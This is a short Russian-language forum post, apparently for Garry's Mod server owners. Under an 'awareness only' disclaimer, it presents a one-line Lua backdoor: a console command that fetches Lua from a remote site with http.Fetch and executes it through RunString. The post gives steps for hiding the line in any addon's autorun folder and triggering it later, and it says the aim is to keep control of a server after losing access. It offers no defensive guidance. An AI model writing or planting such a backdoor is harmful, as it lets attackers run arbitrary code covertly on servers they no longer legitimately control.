Данная тема создана исключительно в ознакомительных целях. Цель темы: Поставить разработчиков серверов в известность о том, что такая уязвимость существует и помочь им справится с недочётом. Я не призываю никого к выполнению действийЧто делает код?
Код отправляет запрос на ваш сайт и получает информацию с созданного на нём lua / txt или прочего файла. Код при помощи http.Fetch обращается к сайту, а он в свою очередь отдаёт скрипту информацию с файла. RunString запускает полученные данные с сайта.
Код:
concommand.Add("com", function() http.Fetch("https://ваш_сайт.com/название_файла.lua", RunString) end)Использование / Установка
Далее закидываем строчку кода в любой аддон по пути lua/autorun/sv/файл.lua
В нужный вам момент прописываем в клиентскую консоль: "com" и файл запуститься.
Чем это полезно?
Полезно это тем, что даже если у вас заберут доступ к серверу, то вы сможете удалённо выбирать и загружать всё то, что вам захочется.
Медиа (Пример использования)
